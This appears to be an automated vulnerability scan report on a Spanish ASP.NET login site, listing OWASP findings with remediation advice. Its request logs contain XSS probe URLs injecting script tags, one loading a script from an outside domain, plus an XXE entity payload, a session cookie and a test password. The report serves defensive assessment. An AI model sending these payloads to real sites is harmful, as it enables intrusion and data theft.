OWASP Top Ten 2017 Scan Report Summary

TARGET URL
http://test.q2bstudio.com/
SCAN DATE
1/29/2020 12:43:19 PM (UTC)
REPORT DATE
1/29/2020 1:15:28 PM (UTC)
SCAN DURATION
00:18:34
pentestonline.es VERSION
5.3.0.24388-5.3-hf6-de321fd
Total Requests
9962
Average Speed
8.94 req/sec.
71
Identified
22
Confirmed
0
Critical
20
Informational

Explanation

EXPLANATION
This report is generated based on OWASP Top Ten 2017 classification. There are 42 more vulnerabilities that are not shown below. Please take a look at the detailed scan report to see them.

71 vulnerabilities listed in OWASP Top Ten 2017 were found on this web site.


Vulnerabilities

Issues Instances Confirmed
CRITICAL
0 0 0
HIGH
1 2 2
MEDIUM
4 6 3
LOW
8 32 4
INFORMATION
6 20 13
BEST PRACTICE
1 11 0
TOTAL 20 71 22


Vulnerabilities By OWASP Top Ten 2017

OWASP A3 - Sensitive Data Exposure

URL Severity Vulnerability
http://test.q2bstudio.com/ High Password Transmitted over HTTP
http://test.q2bstudio.com/ High Password Transmitted over HTTP
http://test.q2bstudio.com/ High Password Transmitted over HTTP
https://test.q2bstudio.com/ Medium Insecure Transportation Security Protocol Supported (SSLv3)
https://test.q2bstudio.com/ Medium Active Mixed Content over HTTPS
https://test.q2bstudio.com/ Medium Weak Ciphers Enabled
https://test.q2bstudio.com/ Low HTTP Strict Transport Security (HSTS) Policy Not Enabled
http://test.q2bstudio.com/ Best Practice Referrer-Policy Not Implemented
http://test.q2bstudio.com/ Best Practice Referrer-Policy Not Implemented
http://test.q2bstudio.com/ Best Practice Referrer-Policy Not Implemented
http://test.q2bstudio.com/assets/ Best Practice Referrer-Policy Not Implemented
http://test.q2bstudio.com/assets/ Best Practice Referrer-Policy Not Implemented
http://test.q2bstudio.com/assets/demo/ Best Practice Referrer-Policy Not Implemented
http://test.q2bstudio.com/assets/demo/ Best Practice Referrer-Policy Not Implemented
http://test.q2bstudio.com/assets/demo/themes/ Best Practice Referrer-Policy Not Implemented
http://test.q2bstudio.com/assets/demo/themes/ Best Practice Referrer-Policy Not Implemented
http://test.q2bstudio.com/assets/javascripts/ Best Practice Referrer-Policy Not Implemented
http://test.q2bstudio.com/assets/javascripts/ Best Practice Referrer-Policy Not Implemented
http://test.q2bstudio.com/assets/stylesheets/ Best Practice Referrer-Policy Not Implemented
http://test.q2bstudio.com/assets/stylesheets/ Best Practice Referrer-Policy Not Implemented
http://test.q2bstudio.com/Resources/ Best Practice Referrer-Policy Not Implemented
http://test.q2bstudio.com/Resources/ Best Practice Referrer-Policy Not Implemented
http://test.q2bstudio.com/Resources/images/ Best Practice Referrer-Policy Not Implemented
http://test.q2bstudio.com/Resources/images/ Best Practice Referrer-Policy Not Implemented
http://test.q2bstudio.com/Resources/logo/ Best Practice Referrer-Policy Not Implemented
http://test.q2bstudio.com/Resources/logo/ Best Practice Referrer-Policy Not Implemented
http://test.q2bstudio.com/trace.axd Best Practice Referrer-Policy Not Implemented
http://test.q2bstudio.com/trace.axd Best Practice Referrer-Policy Not Implemented

OWASP A6 - Security Misconfiguration

URL Severity Vulnerability
http://test.q2bstudio.com/ Low Autocomplete Enabled
http://test.q2bstudio.com/ Low Missing X-Frame-Options Header
http://test.q2bstudio.com/ Low Cookie Not Marked as HttpOnly
http://test.q2bstudio.com/ Low Autocomplete Enabled
http://test.q2bstudio.com/ Low Programming Error Message
http://test.q2bstudio.com/ Low Missing X-Frame-Options Header
http://test.q2bstudio.com/ Low Autocomplete Enabled
http://test.q2bstudio.com/ Low Programming Error Message
http://test.q2bstudio.com/ Low Missing X-Frame-Options Header
http://test.q2bstudio.com/?%27%22--%3e%3c%2fstyle%3e%3c%2fscRipt%3e%3cscRipt%20src%3d%22%2f%2fen5k_y54-pfmmjdpxw0jylmw7ejnljou7quqmkj2ius%26%2346%3br87%26%2346%3bme%22%3e%3c%2fscRipt%3e Low Stack Trace Disclosure (ASP.NET)
http://test.q2bstudio.com/?%27%22--%3e%3c%2fstyle%3e%3c%2fscRipt%3e%3cscRipt%20src%3d%22%2f%2fen5k_y54-pfmmjdpxw0jylmw7ejnljou7quqmkj2ius%26%2346%3br87%26%2346%3bme%22%3e%3c%2fscRipt%3e Low Version Disclosure (ASP.NET)
http://test.q2bstudio.com/assets/ Low Missing X-Frame-Options Header
http://test.q2bstudio.com/assets/ Low Missing X-Frame-Options Header
http://test.q2bstudio.com/assets/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x000037)%3C/scRipt%3E Low Stack Trace Disclosure (ASP.NET)
http://test.q2bstudio.com/assets/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x000037)%3C/scRipt%3E Low Stack Trace Disclosure (ASP.NET)
http://test.q2bstudio.com/assets/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x000038)%3C/scRipt%3E Low Stack Trace Disclosure (ASP.NET)
http://test.q2bstudio.com/assets/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x000038)%3C/scRipt%3E Low Stack Trace Disclosure (ASP.NET)
http://test.q2bstudio.com/assets/demo/ Low Missing X-Frame-Options Header
http://test.q2bstudio.com/assets/demo/ Low Missing X-Frame-Options Header
http://test.q2bstudio.com/assets/demo/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x00028F)%3C/scRipt%3E Low Stack Trace Disclosure (ASP.NET)
http://test.q2bstudio.com/assets/demo/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x00028F)%3C/scRipt%3E Low Stack Trace Disclosure (ASP.NET)
http://test.q2bstudio.com/assets/demo/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x000290)%3C/scRipt%3E Low Stack Trace Disclosure (ASP.NET)
http://test.q2bstudio.com/assets/demo/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x000290)%3C/scRipt%3E Low Stack Trace Disclosure (ASP.NET)
http://test.q2bstudio.com/assets/demo/themes/ Low Missing X-Frame-Options Header
http://test.q2bstudio.com/assets/demo/themes/ Low Missing X-Frame-Options Header
http://test.q2bstudio.com/assets/javascripts/ Low Missing X-Frame-Options Header
http://test.q2bstudio.com/assets/javascripts/ Low Missing X-Frame-Options Header
http://test.q2bstudio.com/assets/javascripts/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x000163)%3C/scRipt%3E Low Stack Trace Disclosure (ASP.NET)
http://test.q2bstudio.com/assets/javascripts/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x000163)%3C/scRipt%3E Low Stack Trace Disclosure (ASP.NET)
http://test.q2bstudio.com/assets/javascripts/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x000164)%3C/scRipt%3E Low Stack Trace Disclosure (ASP.NET)
http://test.q2bstudio.com/assets/javascripts/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x000164)%3C/scRipt%3E Low Stack Trace Disclosure (ASP.NET)
http://test.q2bstudio.com/assets/stylesheets/ Low Missing X-Frame-Options Header
http://test.q2bstudio.com/assets/stylesheets/ Low Missing X-Frame-Options Header
http://test.q2bstudio.com/Resources/ Low Missing X-Frame-Options Header
http://test.q2bstudio.com/Resources/ Low Missing X-Frame-Options Header
http://test.q2bstudio.com/Resources/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x00033D)%3C/scRipt%3E Low Stack Trace Disclosure (ASP.NET)
http://test.q2bstudio.com/Resources/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x00033D)%3C/scRipt%3E Low Stack Trace Disclosure (ASP.NET)
http://test.q2bstudio.com/Resources/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x000358)%3C/scRipt%3E Low Stack Trace Disclosure (ASP.NET)
http://test.q2bstudio.com/Resources/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x000358)%3C/scRipt%3E Low Stack Trace Disclosure (ASP.NET)
http://test.q2bstudio.com/Resources/images/ Low Missing X-Frame-Options Header
http://test.q2bstudio.com/Resources/images/ Low Missing X-Frame-Options Header
http://test.q2bstudio.com/Resources/images/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x00041F)%3C/scRipt%3E Low Stack Trace Disclosure (ASP.NET)
http://test.q2bstudio.com/Resources/images/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x00041F)%3C/scRipt%3E Low Stack Trace Disclosure (ASP.NET)
http://test.q2bstudio.com/Resources/logo/ Low Missing X-Frame-Options Header
http://test.q2bstudio.com/Resources/logo/ Low Missing X-Frame-Options Header
http://test.q2bstudio.com/trace.axd Low Programming Error Message
http://test.q2bstudio.com/trace.axd Low Stack Trace Disclosure (ASP.NET)
http://test.q2bstudio.com/trace.axd Low Programming Error Message
http://test.q2bstudio.com/trace.axd Low Missing X-Frame-Options Header
http://test.q2bstudio.com/trace.axd Low Stack Trace Disclosure (ASP.NET)
http://test.q2bstudio.com/trace.axd Low Programming Error Message
http://test.q2bstudio.com/trace.axd Low Missing X-Frame-Options Header
http://test.q2bstudio.com/trace.axd/%22ns=%22pentestonline.es(0x000A1B) Low Programming Error Message
http://test.q2bstudio.com/trace.axd/%22ns=%22pentestonline.es(0x000A1B) Low Programming Error Message
http://test.q2bstudio.com/ Information Autocomplete Enabled (Password Field)
http://test.q2bstudio.com/ Information OPTIONS Method Enabled
http://test.q2bstudio.com/ Information Autocomplete Enabled (Password Field)
http://test.q2bstudio.com/ Information Autocomplete Enabled (Password Field)
http://test.q2bstudio.com/assets/ Information OPTIONS Method Enabled
http://test.q2bstudio.com/assets/ Information OPTIONS Method Enabled
http://test.q2bstudio.com/assets/demo/ Information OPTIONS Method Enabled
http://test.q2bstudio.com/assets/demo/ Information OPTIONS Method Enabled
http://test.q2bstudio.com/assets/demo/themes/ Information OPTIONS Method Enabled
http://test.q2bstudio.com/assets/demo/themes/ Information OPTIONS Method Enabled
http://test.q2bstudio.com/assets/images/ Information OPTIONS Method Enabled
http://test.q2bstudio.com/assets/images/ Information OPTIONS Method Enabled
http://test.q2bstudio.com/assets/images/plugins/ Information OPTIONS Method Enabled
http://test.q2bstudio.com/assets/images/plugins/ Information OPTIONS Method Enabled
http://test.q2bstudio.com/assets/javascripts/ Information OPTIONS Method Enabled
http://test.q2bstudio.com/assets/javascripts/ Information OPTIONS Method Enabled
http://test.q2bstudio.com/assets/javascripts/ie.min.js Information Version Disclosure (IIS)
http://test.q2bstudio.com/assets/stylesheets/ Information OPTIONS Method Enabled
http://test.q2bstudio.com/assets/stylesheets/ Information OPTIONS Method Enabled
http://test.q2bstudio.com/Resources/ Information OPTIONS Method Enabled
http://test.q2bstudio.com/Resources/ Information OPTIONS Method Enabled
http://test.q2bstudio.com/Resources/images/ Information OPTIONS Method Enabled
http://test.q2bstudio.com/Resources/images/ Information OPTIONS Method Enabled
http://test.q2bstudio.com/Resources/logo/ Information OPTIONS Method Enabled
http://test.q2bstudio.com/Resources/logo/ Information OPTIONS Method Enabled

OWASP A9 - Using Components with Known Vulnerabilities

URL Severity Vulnerability
http://test.q2bstudio.com/ Medium Out-of-date Version (Bootstrap)
http://test.q2bstudio.com/ Medium Out-of-date Version (Bootstrap)
http://test.q2bstudio.com/ Medium Out-of-date Version (Bootstrap)
http://test.q2bstudio.com/assets/javascripts/bootstrap.min.js Medium Out-of-date Version (Bootstrap)
http://test.q2bstudio.com/assets/javascripts/bootstrap.min.js Medium Out-of-date Version (Bootstrap)
https://test.q2bstudio.com/ Low Insecure Transportation Security Protocol Supported (TLS 1.0)
http://test.q2bstudio.com/ Information Out-of-date Version (jQuery)
http://test.q2bstudio.com/ Information Out-of-date Version (Moment.js)
http://test.q2bstudio.com/ Information Out-of-date Version (jQuery UI Autocomplete)
http://test.q2bstudio.com/ Information Out-of-date Version (jQuery)
http://test.q2bstudio.com/ Information Out-of-date Version (Moment.js)
http://test.q2bstudio.com/ Information Out-of-date Version (jQuery UI Autocomplete)
http://test.q2bstudio.com/ Information Out-of-date Version (jQuery)
http://test.q2bstudio.com/ Information Out-of-date Version (Moment.js)
http://test.q2bstudio.com/ Information Out-of-date Version (jQuery UI Autocomplete)

1. Password Transmitted over HTTP

2 TOTAL
HIGH
Confirmed
2

pentestonline.es detected that password data is being transmitted over HTTP.

Impact

If an attacker can intercept network traffic, he/she can steal users' credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.

Classification

OWASP 2017-A3

CVSS 3.0

CVSS Vector String: CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
Base: 5.7 (Medium)
Temporal: 5.7 (Medium)
Environmental: 5.7 (Medium)

1.1. http://test.q2bstudio.com/

Confirmed
http://test.q2bstudio.com/

Input Name

password_id

Form target action

http://test.q2bstudio.com/

Request

GET / HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response



span class="fa fa-user signin-form-icon"></span>
</div>
<!-- / Username -->

<div class="form-group w-icon">

<input name="password_id" type="password" id="password_id" class="form-control input-lg format_input_login" placeholder="Contraseña" />
<span class="fa fa-lock signin-form-icon"></span>
</div>
<!-- / Password -->
</div>
<!-- / Form -->
</d

1.2. http://test.q2bstudio.com/

Confirmed
http://test.q2bstudio.com/

Input Name

password_id

Form target action

./

Request

POST / HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 124
Content-Type: application/xml
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

<?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "data:;base64,TlM3NzU0NTYxNDQ2NTc1">]><ns>&lfi;</ns>

Response



span class="fa fa-user signin-form-icon"></span>
</div>
<!-- / Username -->

<div class="form-group w-icon">

<input name="password_id" type="password" id="password_id" class="form-control input-lg format_input_login" placeholder="Contraseña" />password_id" type="password" id="password_id" class="form-control input-lg format_input_login" placeholder="Contraseña" />
<span class="fa fa-lock signin-form-icon"></span>
</

2. Weak Ciphers Enabled

1 TOTAL
MEDIUM
Confirmed
1

pentestonline.es detected that weak ciphers are enabled during secure communication (SSL).

You should allow only strong ciphers on your web server to protect secure communication with your visitors.

Impact

Attackers might decrypt SSL traffic between your server and your visitors.

Actions to Take

  1. For Apache, you should modify the SSLCipherSuite directive in the httpd.conf.
    SSLCipherSuite ALL:!aNULL:!ADH:!eNULL:!LOW:!EXP:RC4+RSA:+HIGH:+MEDIUM
    
  2. For Microsoft IIS, you should make some changes to the system registry.

    a. Click Start, click Run, type regedt32 or type regedit, and then click OK.
    b. In Registry Editor, locate the following registry key: HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders
    c. Set "Enabled" DWORD to "0x0" for the following registry keys:
    SCHANNEL\Ciphers\DES 56/56
    SCHANNEL\Ciphers\RC4 64/128
    SCHANNEL\Ciphers\RC4 40/128
    SCHANNEL\Ciphers\RC2 56/128
    SCHANNEL\Ciphers\RC2 40/128
    SCHANNEL\Ciphers\NULL
    SCHANNEL\Hashes\MD5

Remedy

Configure your web server to disallow using weak ciphers.

External References

Classification

OWASP 2017-A3

CVSS 3.0

CVSS Vector String: CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
Base: 6.8 (Medium)
Temporal: 6.8 (Medium)
Environmental: 6.8 (Medium)

2.1. https://test.q2bstudio.com/

Confirmed
https://test.q2bstudio.com/

List of Supported Weak Ciphers

Request

[pentestonline.es] SSL Connection

Response

[pentestonline.es] SSL Connection

3. Insecure Transportation Security Protocol Supported (SSLv3)

1 TOTAL
MEDIUM
Confirmed
1

pentestonline.es detected that insecure transportation security protocol (SSLv3) is supported by your web server.

SSLv3 has several flaws. An attacker can cause connection failures and they can trigger the use of SSL 3.0 to exploit vulnerabilities like POODLE.

Impact

Attackers can perform man-in-the-middle attacks and observe the encryption traffic between your website and its visitors.

Remedy

Configure your web server to disallow using weak ciphers. You need to restart the web server to enable changes.

  • For Apache, adjust the SSLProtocol directive provided by the mod_ssl module. This directive can be set either at the server level or in a virtual host configuration.
    SSLProtocol +TLSv1.1 +TLSv1.2
    
  • For Nginx, locate any use of the directive ssl_protocols in the nginx.conf file and remove SSLv3.
    ssl_protocols TLSv1.1 TLSv1.2;
    
  • For Microsoft IIS, you should make some changes on the system registry.
    1. Click on Start and then Run, type regedt32 or regedit, and then click OK.
    2. In Registry Editor, locate the following registry key or create if it does not exist:
      HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0\
      
    3. Locate a key named Server or create if it doesn't exist.
    4. Under the Server key, locate a DWORD value named Enabled or create if it doesn't exist and set its value to "0".
  • For lighttpd, put the following lines in your configuration file:
    ssl.use-sslv2 = "disable"
    ssl.use-sslv3 = "disable"
    

External References

Classification

OWASP 2017-A3

CVSS 3.0

CVSS Vector String: CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C
Base: 6.8 (Medium)
Temporal: 6.1 (Medium)
Environmental: 6.1 (Medium)

3.1. https://test.q2bstudio.com/

Confirmed
https://test.q2bstudio.com/

Request

[pentestonline.es] SSL Connection

Response

[pentestonline.es] SSL Connection

4. Out-of-date Version (Bootstrap)

3 TOTAL
MEDIUM

pentestonline.es identified that the target web site is using Bootstrap and detected that it is out of date.

Impact

Since this is an old version of the software, it may be vulnerable to attacks.

Remedy

Please upgrade your installation of Bootstrap to the latest stable version.

Remedy References

Known Vulnerabilities in this Version

bootstrap.js Cross-Site Scripting (XSS) Vulnerability

In Bootstrap before 4.1.2, XSS is possible in the collapse data-parent attribute.

External References

bootstrap.js Cross-Site Scripting (XSS) Vulnerability

In Bootstrap before 4.1.2, XSS is possible in the data-container property of tooltip.

External References

bootstrap.js Cross-Site Scripting (XSS) Vulnerability

In Bootstrap 3.x before 3.4.0 and 4.x-beta before 4.0.0-beta.2, XSS is possible in the data-target attribute, a different vulnerability than CVE-2018-14041.

External References

Classification

OWASP 2017-A9

4.1. http://test.q2bstudio.com/

http://test.q2bstudio.com/

Identified Version

3.3.7

Latest Version

3.4.1 (in this branch)

Vulnerability Database

Result is based on 04/05/2019 16:30:00 vulnerability database content.

Certainty

Request

GET / HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 200 OK
Set-Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; path=/; HttpOnly
Set-Cookie: q2blng=ca-ES; expires=Wed, 05-Feb-2020 12:43:22 GMT; path=/
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 3261
Content-Type: text/html; charset=utf-8
Content-Encoding:
Date: Wed, 29 Jan 2020 12:43:22 GMT
Cache-Control: private



<!DOCTYPE html>
<!--[if IE 8]> <html class="ie8"> <![endif]-->
<!--[if IE 9]> <html class="ie9 gt-ie8"> <![endif]-->
<!--[if gt IE 9]><!-->
<html class="gt-ie8 gt-ie9 not-ie">
<!--<![endif]-->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>Login</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no, minimum-scale=1.0, maximum-scale=1.0">
<link rel="shortcut icon" href="Resources/logo/logo_vc.png" />
<!-- Open Sans font from Google CDN -->
<link href="http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,400,600,700,300&subset=latin" rel="stylesheet" type="text/css">

<!-- Pixel Admin's stylesheets -->
<link href="assets/stylesheets/bootstrap.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/pixel-admin.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/pages.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/rtl.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/themes.min.css" rel="stylesheet" type="text/css">

<!-- Get jQuery from Google CDN -->
<!--[if !IE]> -->
<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js">' + "<" + "/script>"); </script>
<!-- <![endif]-->
<!--[if lte IE 9]>
<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js">'

4.2. http://test.q2bstudio.com/assets/javascripts/bootstrap.min.js

http://test.q2bstudio.com/assets/javascripts/bootstrap.min.js

Identified Version

3.3.7

Latest Version

3.4.1 (in this branch)

Vulnerability Database

Result is based on 04/05/2019 16:30:00 vulnerability database content.

Certainty

Request

GET /assets/javascripts/bootstrap.min.js HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
Referer: http://test.q2bstudio.com/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response



9
Last-Modified: Mon, 01 Jul 2019 07:45:39 GMT
Accept-Ranges: bytes
Content-Type: application/javascript
Content-Encoding:
Date: Wed, 29 Jan 2020 12:43:32 GMT
ETag: "8013f4f9e02fd51:0"

/*!
* Bootstrap v3.3.7 (http://getbootstrap.com)
* Copyright 2011-2016 Twitter, Inc.
* Licensed under the MIT license
*/
if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(

4.3. http://test.q2bstudio.com/

http://test.q2bstudio.com/

Identified Version

3.3.7

Latest Version

3.4.1 (in this branch)

Vulnerability Database

Result is based on 04/05/2019 16:30:00 vulnerability database content.

Certainty

Request

POST / HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 160
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
Referer: http://test.q2bstudio.com/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

btnResetPass=%c2%bfOlvidaste+tu+contrase%c3%b1a%3f&username_id=Smith&__VIEWSTATE=IL&__VIEWSTATE_KEY=VS_52.143.173.9_637159022021935337&password_id=N3tsp%40rker-

Response

HTTP/1.1 200 OK
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 3216
Content-Type: text/html; charset=utf-8
Content-Encoding:
Date: Wed, 29 Jan 2020 12:43:32 GMT
Cache-Control: private



<!DOCTYPE html>
<!--[if IE 8]> <html class="ie8"> <![endif]-->
<!--[if IE 9]> <html class="ie9 gt-ie8"> <![endif]-->
<!--[if gt IE 9]><!-->
<html class="gt-ie8 gt-ie9 not-ie">
<!--<![endif]-->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>Login</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no, minimum-scale=1.0, maximum-scale=1.0">
<link rel="shortcut icon" href="Resources/logo/logo_vc.png" />
<!-- Open Sans font from Google CDN -->
<link href="http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,400,600,700,300&subset=latin" rel="stylesheet" type="text/css">

<!-- Pixel Admin's stylesheets -->
<link href="assets/stylesheets/bootstrap.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/pixel-admin.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/pages.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/rtl.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/themes.min.css" rel="stylesheet" type="text/css">

<!-- Get jQuery from Google CDN -->
<!--[if !IE]> -->
<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js">' + "<" + "/script>"); </script>
<!-- <![endif]-->
<!--[if lte IE 9]>
<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js">'+"<"+"/script>"); </script>
<![endif]-->


<!-- Pixel Admin's javascripts -->
<script src="assets/javascripts/bootstrap.min.js"></script>


5. Active Mixed Content over HTTPS

1 TOTAL
MEDIUM
Confirmed
1

Resources Loaded from Insecure Origin (HTTP)

http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,400,600,700,300&subset=latin

pentestonline.es detected that an active content loaded over HTTP within an HTTPS page.

Impact

Active Content is a resource which can run in the context of your page and moreover can alter the entire page. If the HTTPS page includes active content like scripts or stylesheets retrieved through regular, cleartext HTTP, then the connection is only partially encrypted. The unencrypted content is accessible to sniffers.

A man-in-the-middle attacker can intercept the request for the HTTP content and also rewrite the response to include malicious codes. Malicious active content can steal the user's credentials, acquire sensitive data about the user, or attempt to install malware on the user's system (by leveraging vulnerabilities in the browser or its plugins, for example), and therefore the connection is not safeguarded anymore.

Remedy

There are two technologies to defense against the mixed content issues:
  1. HTTP Strict Transport Security (HSTS) is a mechanism that enforces secure resource retrieval, even in the face of user mistakes (attempting to access your web site on port 80) and implementation errors (your developers place an insecure link into a secure page)
  2. Content Security Policy (CSP) can be used to block insecure resource retrieval from third-party web sites
  3. Last but not least, you can use "protocol relative URLs" to have the user's browser automatically choose HTTP or HTTPS as appropriate, depending on which protocol the user is connected with. For example:

A protocol relative URL to load an style would look like <link rel="stylesheet" href="//example.com/style.css"/>.

Same for scripts <script type="text/javascript" src="//example.com/code.js"></script>

The browser will automatically add either "http:" or "https:" to the start of the URL, whichever is appropriate.

External References

Remedy References

Classification

OWASP 2017-A3

5.1. https://test.q2bstudio.com/

Confirmed
https://test.q2bstudio.com/

Request

GET / HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
Referer: https://test.q2bstudio.com/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 200 OK
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 3259
Content-Type: text/html; charset=utf-8
Content-Encoding:
Date: Wed, 29 Jan 2020 12:43:42 GMT
Cache-Control: private



<!DOCTYPE html>
<!--[if IE 8]> <html class="ie8"> <![endif]-->
<!--[if IE 9]> <html class="ie9 gt-ie8"> <![endif]-->
<!--[if gt IE 9]><!-->
<html class="gt-ie8 gt-ie9 not-ie">
<!--<![endif]-->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>Login</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no, minimum-scale=1.0, maximum-scale=1.0">
<link rel="shortcut icon" href="Resources/logo/logo_vc.png" />
<!-- Open Sans font from Google CDN -->
<link href="http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,400,600,700,300&subset=latin" rel="stylesheet" type="text/css">

<!-- Pixel Admin's stylesheets -->
<link href="assets/stylesheets/bootstrap.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/pixel-admin.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/pages.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/rtl.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/themes.min.css" rel="stylesheet" type="text/css">

<!-- Get jQuery from Google CDN -->
